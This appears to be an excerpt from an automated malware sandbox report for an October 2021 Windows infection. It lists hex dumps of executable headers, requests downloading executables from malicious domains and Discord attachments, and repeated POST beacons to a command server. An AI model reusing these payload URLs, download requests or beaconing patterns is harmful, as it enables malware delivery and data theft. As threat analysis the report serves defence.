00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e4 35 db 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 b2 07 00 00 c4 70 02 00 00 00 00 10 b1 05 00 00 10 00 00 00 d0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 78 02 00 04 00 00 1e e7 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 b5 07 00 50 00 00 00 00 50 77 02 68 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 02 8c 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 a5 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 b0 07 00 00 10 00 00 00 b2 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 d0 07 00 00 16 00 00 00 b6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 6d 69 64 00 00 e5 02 00 00 00 40 77 02 00 04 00 00 00 cc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 3f 00 00 00 50 77 02 00 40 00 00 00 d0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 cc 23 01 00 00 90 77 02 00 24 01 00 00 10 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 15:07:26 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
                      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49830 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: GET /263873486.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iyc.jelikob.ru
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbqwgqd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkdnntfgka.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ebdlywmw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cdpdtdiu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ahqwfkl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mmrybwu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dlvxn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://axwksdg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uoujietq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://byswyrncsp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tvwcnabmgu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkprjvqhr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://maugsjqxon.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://evbmwx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cmmceyrmx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qtsqgh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pfcgdf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://majoeohj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fftiyhdhr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ogkwhlvf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uopmdi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iqyfkemb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://macmw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lqkdg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bdliq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://caojtt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://exjwgsme.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tejnpx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fkxqdusmf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://plwck.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://doqhc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bwosllgktu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dafoy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nitiuliqi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ymtgtssq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jvgpciy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: hajezey1.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drcvhg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: hajezey1.top
                      Source: Joe Sandbox ViewASN Name: VM-HOSTINGRU VM-HOSTINGRU
                      Source: Joe Sandbox ViewASN Name: RTCOMM-ASRU RTCOMM-ASRU
                      Source: Joe Sandbox ViewIP Address: 81.177.141.36 81.177.141.36
                      Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
                      Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
                      Source: global trafficTCP traffic: 192.168.2.7:49843 -> 93.115.20.139:28978
                      Source: 2049.exe, 0000001C.00000002.502944034.0000000000CE5000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: 2049.exe, 0000001C.00000002.504210996.0000000003999000.00000004.00000001.sdmp, AdvancedRun.exe.28.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: 2049.exe, 0000001C.00000002.504210996.0000000003999000.00000004.00000001.sdmp, AdvancedRun.exe.28.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: 2049.exe, 0000001C.00000002.504210996.0000000003999000.00000004.00000001.sdmp, AdvancedRun.exe.28.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: 2049.exe, 0000001C.00000002.504210996.0000000003999000.00000004.00000001.sdmp, AdvancedRun.exe.28.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: 2049.exe, 2049.exe.7.drString found in binary or memory: http://fontello.com
                      Source: B644.exe, 00000025.00000003.459336131.0000000002E97000.00000004.00000001.sdmpString found in binary or memory: http://hajegalive.top/
                      Source: 2049.exe, 0000001C.00000002.504210996.0000000003999000.00000004.00000001.sdmp, AdvancedRun.exe.28.drString found in binary or memory: http://ocsp.sectigo.com0
                      Source: explorer.exe, 00000007.00000000.299159453.000000000EDFA000.00000004.00000001.sdmpString found in binary or memory: http://schemas.micr
                      Source: 2049.exe, 0000001C.00000002.503607295.0000000002991000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: B644.exe, 00000025.00000003.459129035.0000000002E81000.00000004.00000001.sdmpString found in binary or memory: http://telegalive.top/
                      Source: B644.exe, 00000025.00000003.458909439.0000000002E6B000.00000004.00000001.sdmpString found in binary or memory: http://telegalive.top/agrybirdsgamerept
                      Source: 5508.exe, 0000001F.00000000.408410706.0000000000F72000.00000002.00020000.sdmp, 5508.exe.7.drString found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
                      Source: explorer.exe, 00000007.00000000.278800584.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                      Source: AdvancedRun.exe, AdvancedRun.exe, 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000002.477940508.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.28.drString found in binary or memory: http://www.nirsoft.net/
                      Source: sqlite3.dll.37.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: B644.exe, 00000025.00000003.495994108.000000004DC64000.00000004.00000010.sdmp, 1xVPfvJcrg.37.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: 2049.exe, 0000001C.00000002.504210996.0000000003999000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000028.00000000.469526314.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: 2049.exe, 0000001C.00000002.503607295.0000000002991000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
                      Source: 2049.exeString found in binary or memory: https://cdn.discordapp.com/attachments/8
                      Source: 5508.exe, 0000001F.00000000.408410706.0000000000F72000.00000002.00020000.sdmp, 5508.exe.7.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
                      Source: 5508.exe, 0000001F.00000000.408410706.0000000000F72000.00000002.00020000.sdmp, 5508.exe.7.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
                      Source: 3113.exe, 0000001D.00000000.388443172.0000000000A82000.00000002.00020000.sdmp, 3113.exe.7.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903333369742491648/1E88D378.jpg
                      Source: 2049.exe, 0000001C.00000002.503607295.0000000002991000.00000004.00000001.sdmp, 2049.exe.7.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpg
                      Source: 2049.exe, 0000001C.00000002.503607295.0000000002991000.00000004.00000001.sdmp, 2049.exe.7.drString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpg
                      Source: B644.exe, 00000025.00000003.495994108.000000004DC64000.00000004.00000010.sdmp, 1xVPfvJcrg.37.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: B644.exe, 00000025.00000003.495994108.000000004DC64000.00000004.00000010.sdmp, 1xVPfvJcrg.37.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: B644.exe, 00000025.00000003.495994108.000000004DC64000.00000004.00000010.sdmp, 1xVPfvJcrg.37.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: B644.exe, 00000025.00000003.495994108.000000004DC64000.00000004.00000010.sdmp, 1xVPfvJcrg.37.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: B644.exe, 00000025.00000003.495994108.000000004DC64000.00000004.00000010.sdmp, 1xVPfvJcrg.37.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: B644.exe, 00000025.00000003.495994108.000000004DC64000.00000004.00000010.sdmp, 1xVPfvJcrg.37.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: 2049.exe, 0000001C.00000002.504210996.0000000003999000.00000004.00000001.sdmp, AdvancedRun.exe.28.drString found in binary or memory: https://sectigo.com/CPS0C
                      Source: 2049.exe, 0000001C.00000002.504210996.0000000003999000.00000004.00000001.sdmp, AdvancedRun.exe.28.drString found in binary or memory: https://sectigo.com/CPS0D
                      Source: B644.exe, 00000025.00000003.495994108.000000004DC64000.00000004.00000010.sdmp, 1xVPfvJcrg.37.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownDNS traffic detected: queries for: xacokuo8.top
                      Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903333369742491648/1E88D378.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /263873486.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iyc.jelikob.ru
                      Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
                      Source: global trafficHTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
                      Source: global trafficHTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/1a86e602d0d2d72a354901c42f4d11f8f79e44b1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
                      Source: global trafficHTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/ffdc8614f62a76a5c7889757f570f02f455435ee HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 29 Oct 2021 15:06:47 GMTContent-Type: text/htmlContent-Length: 797Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:06:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f1 11 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
